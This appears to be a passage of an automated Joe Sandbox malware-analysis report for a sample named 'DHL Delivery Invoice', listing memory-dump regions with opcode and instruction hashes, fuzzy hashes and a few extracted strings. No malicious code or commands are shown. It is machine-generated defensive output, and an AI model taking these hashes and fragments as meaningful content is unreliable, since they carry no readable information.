                                                                                                                                  • String ID: fpq$XPpq$\Opq
                                                                                                                                  • API String ID: 0-2571271785
                                                                                                                                  • Opcode ID: 60085f105f18484adbde6360de72be969c12daa1b5e9ec2040c9693f49d1705c
                                                                                                                                  • Instruction ID: 4be2cf7c64418e5395f59f84fb5f029bc62d99d3425c88a3b334fc4a1d54e742
                                                                                                                                  • Opcode Fuzzy Hash: 60085f105f18484adbde6360de72be969c12daa1b5e9ec2040c9693f49d1705c
                                                                                                                                  • Instruction Fuzzy Hash: EC617071F002199FEB549BA4C914BAEBBF6FB88700F208429E506AB395DF758C458B91

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: eb0a725d7b56809cb33e8a020d71731364e048276f007448abc842afa7687810
                                                                                                                                  • Instruction ID: c79ebaf03e60f99c577f5f39d825046d10981eca55c80d15b385fd142d0fce34
                                                                                                                                  • Opcode Fuzzy Hash: eb0a725d7b56809cb33e8a020d71731364e048276f007448abc842afa7687810
                                                                                                                                  • Instruction Fuzzy Hash: 7B514E70B005159FDB64DB69DA50B6EB3F6BB88640F108469D80A9B398EB75EC11CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4258736998.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_e80000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89e2344d3d96b12f9aa09eeaf60f03ceb382dfb55379d24e02e29e14920b320
                                                                                                                                  • Instruction ID: 280407d4eb30915345eae79d7b52f3bfd8cc25a713341d7b90861bac0f160180
                                                                                                                                  • Opcode Fuzzy Hash: d89e2344d3d96b12f9aa09eeaf60f03ceb382dfb55379d24e02e29e14920b320
                                                                                                                                  • Instruction Fuzzy Hash: A4413272D003998FCB14EFB9D9042EEBBF1AF89310F15856AD409E7351EB349845CB90
                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00E8EC7F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4258736998.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_e80000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                  • Opcode ID: a7feb192edb4decdb6d52b75e0171d3c00a67207679cf8f8e4ad881fc9199f0a
                                                                                                                                  • Instruction ID: 00025f3cf40862cad89d6ba771416e27d4b075358d9c9d444b03fcc2b9e7a3d1
                                                                                                                                  • Opcode Fuzzy Hash: a7feb192edb4decdb6d52b75e0171d3c00a67207679cf8f8e4ad881fc9199f0a
                                                                                                                                  • Instruction Fuzzy Hash: B111F0B2C006699BCB10DFAAC544BDEFBF4AF48324F15816AD818B7250D378A944CFE5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: XPpq
                                                                                                                                  • API String ID: 0-1266478781
                                                                                                                                  • Opcode ID: d0a7dd4f4da7e090f1e95f6a66ccd36d96cfc41444c16c818214baa5286eac35
                                                                                                                                  • Instruction ID: fcad7fbd34903f4b8157a541ce4d9bd6bc9efe59e4dd1b607aa81f52b19be684
                                                                                                                                  • Opcode Fuzzy Hash: d0a7dd4f4da7e090f1e95f6a66ccd36d96cfc41444c16c818214baa5286eac35
                                                                                                                                  • Instruction Fuzzy Hash: 7A417F71E102189FDB54DFE4C954BAEBBF6FF88700F20C529E506AB399DA748C458B90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: 2b2db83efb79f4c37a55c063711db06349c3d32bfdd313ee4f927e0adc679665
                                                                                                                                  • Instruction ID: 90d2d4ee0da36464eb93c50934658afd48f91b38e0768b61209c1711f8e8d864
                                                                                                                                  • Opcode Fuzzy Hash: 2b2db83efb79f4c37a55c063711db06349c3d32bfdd313ee4f927e0adc679665
                                                                                                                                  • Instruction Fuzzy Hash: 5D41CD30E107599FDB65DF65C5906AEBBB6BF85700F208A2AD402EB250DBB5D846CF80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: 7973aed206c99e5ae5b4425a42e99de052f7d2ac9df35288a9d47ef49d33d4d0
                                                                                                                                  • Instruction ID: 2bfaa4a995b3821a2d8c25f5d8c0e9547f8f7c131a6fa983ac36354eac7978ac
                                                                                                                                  • Opcode Fuzzy Hash: 7973aed206c99e5ae5b4425a42e99de052f7d2ac9df35288a9d47ef49d33d4d0
                                                                                                                                  • Instruction Fuzzy Hash: B8311431B002258FCF54AB74CA506AE7BA3BF88600F20846CE006DB395DF35CD46CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: c080d4b4d809ed979d74ecb49c80ba0b6196028df22d34f558dbab08955a8418
                                                                                                                                  • Instruction ID: 6d11ab2d492d270a32855cd31dbbc0562c2f0b2f9fd45b2bad9a1597c30a8135
                                                                                                                                  • Opcode Fuzzy Hash: c080d4b4d809ed979d74ecb49c80ba0b6196028df22d34f558dbab08955a8418
                                                                                                                                  • Instruction Fuzzy Hash: B131DE31B006158FDF58AB74DA546AE7BE7BB88600F208428E406DB399DF35DE46CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7ffbf770baafac9f3680ddcd4c0b0f0e7a6ac16be43fb5921fc7a081fb6117cc
                                                                                                                                  • Instruction ID: 5d98fdffe1ef8edbc2f65e6dee3a7e437e2047c6bb3c5a7b6aa0a51ba98514fb
                                                                                                                                  • Opcode Fuzzy Hash: 7ffbf770baafac9f3680ddcd4c0b0f0e7a6ac16be43fb5921fc7a081fb6117cc
                                                                                                                                  • Instruction Fuzzy Hash: CA210171604204DFCB04DF54D9C4B2ABFA5FB84314F20C6ADE80A4B3D6C37AE846CA62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9788e6e366cdbbd3eb0e8c4546a82ba134de07144de80641c2bdd68e6a30b632
                                                                                                                                  • Instruction ID: ac809e7127cee0d34117623b965497aa4d831d2a3195309e257ec722461491e8
                                                                                                                                  • Opcode Fuzzy Hash: 9788e6e366cdbbd3eb0e8c4546a82ba134de07144de80641c2bdd68e6a30b632
                                                                                                                                  • Instruction Fuzzy Hash: 9B213471504204DFCB10DF64C9D4B26BFA5FB84314F20C5ADE84D4B2D2D73AD846CA61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0064c51e488b0904e5d87332fdb5e22c7adaeb0d1fca3ef2234704744d335001
                                                                                                                                  • Instruction ID: 5359b01e5bcce0779d1e6b9f240eb0c6adf7516691b219b5a77ff9473c7b9ad5
                                                                                                                                  • Opcode Fuzzy Hash: 0064c51e488b0904e5d87332fdb5e22c7adaeb0d1fca3ef2234704744d335001
                                                                                                                                  • Instruction Fuzzy Hash: B0212371604244DFDB01DF94D9C4B2AFFA5FB84324F20C6A9E8494B2C5C37AD846CA61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3f6f8606f3de983b983d59218942560f8fdf4964cf8c9052d9c962fd366463a8
                                                                                                                                  • Instruction ID: fe3dd3a4aa1901bb9757f69bba9231618e2665193bb0c1933302864fcb9a7316
                                                                                                                                  • Opcode Fuzzy Hash: 3f6f8606f3de983b983d59218942560f8fdf4964cf8c9052d9c962fd366463a8
                                                                                                                                  • Instruction Fuzzy Hash: 27219D30F101299FCF94DAA9E9506AEB7B6EB84710F248829E405DB344DB31ED51CFC4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 37f8797c0a217554ccc53b3574058d8fa5fdcc31bb54807be994c8ac739dad23
                                                                                                                                  • Instruction ID: 3efa6fe075e7ed7d407c68353ecbe30ee3da379e322e5c1b0872af44799f03b1
                                                                                                                                  • Opcode Fuzzy Hash: 37f8797c0a217554ccc53b3574058d8fa5fdcc31bb54807be994c8ac739dad23
                                                                                                                                  • Instruction Fuzzy Hash: 1A118E31B101384FDF549A69D9146AF73EAAFC8B50F008439D80AE7354EF25DC118BE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7817671c6c23bf1e0b814be372778b1eacaa34867d2a8712e34f7dcc345dee07
                                                                                                                                  • Instruction ID: b3bc8da193bc12ceba79fd2c460d88b82c795d0230c5714d9b33a76009618e5a
                                                                                                                                  • Opcode Fuzzy Hash: 7817671c6c23bf1e0b814be372778b1eacaa34867d2a8712e34f7dcc345dee07
                                                                                                                                  • Instruction Fuzzy Hash: 00012430B101200FDB55CABC8910B2FABD6EBC5B10F14C87AF10ACB395DE25DC424790
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a0dab19227090ddef1afd0461cb80f5031f60fb47ce1169955120cd382adcee3
                                                                                                                                  • Instruction ID: 6812f8daf2c98decf4c3b8fa0468720ceeebaa5f24d1520a38e95787768af09b
                                                                                                                                  • Opcode Fuzzy Hash: a0dab19227090ddef1afd0461cb80f5031f60fb47ce1169955120cd382adcee3
                                                                                                                                  • Instruction Fuzzy Hash: 1F01D431B106241FDB65DA38D855B6F7BE6EB86B10F00886AF14AC7355EF26ED018BC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1c531954a8b9097c89014aeb514c53f01bf7ca3f0672b27817a2e78f977e2e60
                                                                                                                                  • Instruction ID: b97a53f2e55ebd177530ed07f427ed9e3855cff9faafe0a1942f6aafeed7f907
                                                                                                                                  • Opcode Fuzzy Hash: 1c531954a8b9097c89014aeb514c53f01bf7ca3f0672b27817a2e78f977e2e60
                                                                                                                                  • Instruction Fuzzy Hash: B121E0B6D00269EFCB00DF9AD984ACEFBB4FB48710F50812AE518B7240C774A554CFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 6652eeb8aed4b1e6fe96ccaa8552178b570a8723e872266d7c2184c181449fb2
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: 23118B75504280DFDB06CF54D5C4B19BFA2FB84314F24C6AAD8494B796C33AE84ACBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 5d7d8a3ab556b043001d95a77a9aaa4b01a7aeaa2c04eb521434947efe490286
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: DE11DD75504284CFCB11CF50D9C4B16BFA2FB84318F24C6AED8494B6A2C33AD84ACF62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                  • Instruction ID: 70781312f0c695d7b364e81d7234f1c631402cd5f6a9fc93625a520730c10450
                                                                                                                                  • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                  • Instruction Fuzzy Hash: 3E11BF76504284CFDB12CF54D5C4B56FFA1FB84324F24C6AADC494B696C33AD81ACBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c570cf21b9396bd2863c3d6fc8b6467d5fcb5ba541b7dc6d6439567a0bc20dc9
                                                                                                                                  • Instruction ID: 9c6312560e8a7dcaba9402734c9452419d0a83b165f1cfacdb03e916f9706c75
                                                                                                                                  • Opcode Fuzzy Hash: c570cf21b9396bd2863c3d6fc8b6467d5fcb5ba541b7dc6d6439567a0bc20dc9
                                                                                                                                  • Instruction Fuzzy Hash: 2B012234A053455FCB91EBB8E8107AEBBF5FB86300F1080BAD904D7257EB348841CBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e399a45626b5f8aeffb4fb0d0df4b82b5ffc50fb6b5243fe701d3071b3a9d83e
                                                                                                                                  • Instruction ID: 1a9375cfb516edbd029b54159c68ebf2dec5f9ec25e214ee526dbfb1f43acec1
                                                                                                                                  • Opcode Fuzzy Hash: e399a45626b5f8aeffb4fb0d0df4b82b5ffc50fb6b5243fe701d3071b3a9d83e
                                                                                                                                  • Instruction Fuzzy Hash: 4301D435B142210FCB659A7D9850B3B67E6EBC5B20F14882AE20AC7351DA25DD024BD5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: db183b2928c81c07bafcf0cac03a68a0ed2a60b10635b19535a23fa30447d437
                                                                                                                                  • Instruction ID: 6b697ce77ea17869cc5ad8ef4ea844619ea2174609dbdd7861a2efee09fb527f
                                                                                                                                  • Opcode Fuzzy Hash: db183b2928c81c07bafcf0cac03a68a0ed2a60b10635b19535a23fa30447d437
                                                                                                                                  • Instruction Fuzzy Hash: AB11A2B5D01259EFCB00DF9AD884ADEFFB4FB49310F50812AE518A7250C375A554CFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 514d0c5277e292a624aa25fc2a91b2173c03ff05b4b4bf7371fc6d40c4198514
                                                                                                                                  • Instruction ID: ae0ed114997149129ad1d57c1d314e5768e8ed3f4897b7187464f294fbf9749a
                                                                                                                                  • Opcode Fuzzy Hash: 514d0c5277e292a624aa25fc2a91b2173c03ff05b4b4bf7371fc6d40c4198514
                                                                                                                                  • Instruction Fuzzy Hash: 4601D631B101200BDB5899BDD510B2FB3DAEBC8B10F10C839F10AC7344EE22DC424B84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 02cafbe1e1d595c57cff73ac87b47b415e23b576c6ae1d0b74fb95c67e405f36
                                                                                                                                  • Instruction ID: 0e0b204edc7acf5e83cdbe0e486d728988ec47fe28813eafb760f4b728bccad9
                                                                                                                                  • Opcode Fuzzy Hash: 02cafbe1e1d595c57cff73ac87b47b415e23b576c6ae1d0b74fb95c67e405f36
                                                                                                                                  • Instruction Fuzzy Hash: BE01A231B100384BDFA49A69DD146EF33ABAFC8A40F04853AD90AE7284EF60CC1647D5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9461ef6b6068701c1ad6f44d8190b4ed14a8bb974e09cf452e2da290e711bc83
                                                                                                                                  • Instruction ID: 20cfba34b8cf36056d2de83da51b9f8dfb66f764da5366de960528181ba7ca48
                                                                                                                                  • Opcode Fuzzy Hash: 9461ef6b6068701c1ad6f44d8190b4ed14a8bb974e09cf452e2da290e711bc83
                                                                                                                                  • Instruction Fuzzy Hash: 19018131B102210BCB65997D9451B2F63DAE7C9B20F10883AE60AC7344EE26DC024BD5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ade0149f1280d9ce4bab02e594735052fccd94b74590028d038d90823b3d4ae1
                                                                                                                                  • Instruction ID: ee70572d7ec016e0be733b0f77488c2c6c2b64bc3772fd0fa60b6385de33cbc7
                                                                                                                                  • Opcode Fuzzy Hash: ade0149f1280d9ce4bab02e594735052fccd94b74590028d038d90823b3d4ae1
                                                                                                                                  • Instruction Fuzzy Hash: AA013C31B105244FDB65AA7DD554B2EB3D6EB8AB50F10C829E54AC7354EE26ED018BC0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256234823.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_afd000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9e759cdb9b513dba306809d0e43a8c3eaf404e658332f533e4f2924da40935a7
                                                                                                                                  • Instruction ID: ec8a22c7b8c8cf764ec7438e0f2bc3a3b7c844e40d2878c2d6cbbc1ec66c9b20
                                                                                                                                  • Opcode Fuzzy Hash: 9e759cdb9b513dba306809d0e43a8c3eaf404e658332f533e4f2924da40935a7
                                                                                                                                  • Instruction Fuzzy Hash: 0501FC310083489AE7124BA5CDC4777BFA9DF41364F18C46AFE094A186C275D840C671
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 77d0ce6c88f06bee6dfcbb3b28c984f6fb92e5f7e39708761abe8c4400f9b17f
                                                                                                                                  • Instruction ID: 540a06302117568eefd86438c4fcdc3de5b2c916ff9ed60c3d7c6bc19c987a74
                                                                                                                                  • Opcode Fuzzy Hash: 77d0ce6c88f06bee6dfcbb3b28c984f6fb92e5f7e39708761abe8c4400f9b17f
                                                                                                                                  • Instruction Fuzzy Hash: C301C831F212289BCF58EA79E841A9DB775F784710F108539E905F7345DB32A9058BC0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256234823.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_afd000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb89ea11a1e7eb850518e61562b4ebec396aee4c4616ead60d966e630359eecc
                                                                                                                                  • Instruction ID: fe5b6cbc02c9a370f7f79a56e1813ee556612b9b0994e703ac3dc1fd81387ce5
                                                                                                                                  • Opcode Fuzzy Hash: fb89ea11a1e7eb850518e61562b4ebec396aee4c4616ead60d966e630359eecc
                                                                                                                                  • Instruction Fuzzy Hash: D1F0C272008344AAE7118F56CCC4B62FFA8EB51324F18C45AFE484A286C2B99840CA70
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0fb1c254b5a95f877997403188de2cd931dc25fd8211f704866ce0d4a1493612
                                                                                                                                  • Instruction ID: 0aa75f3b86a866ef59d37da69ffaa310d96948d6c38bebf746cafdabc3b98ef9
                                                                                                                                  • Opcode Fuzzy Hash: 0fb1c254b5a95f877997403188de2cd931dc25fd8211f704866ce0d4a1493612
                                                                                                                                  • Instruction Fuzzy Hash: 8EF05874A102098FDB80EFB8855022EB7F6BB89200F10817D8909E7359EB748941CBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
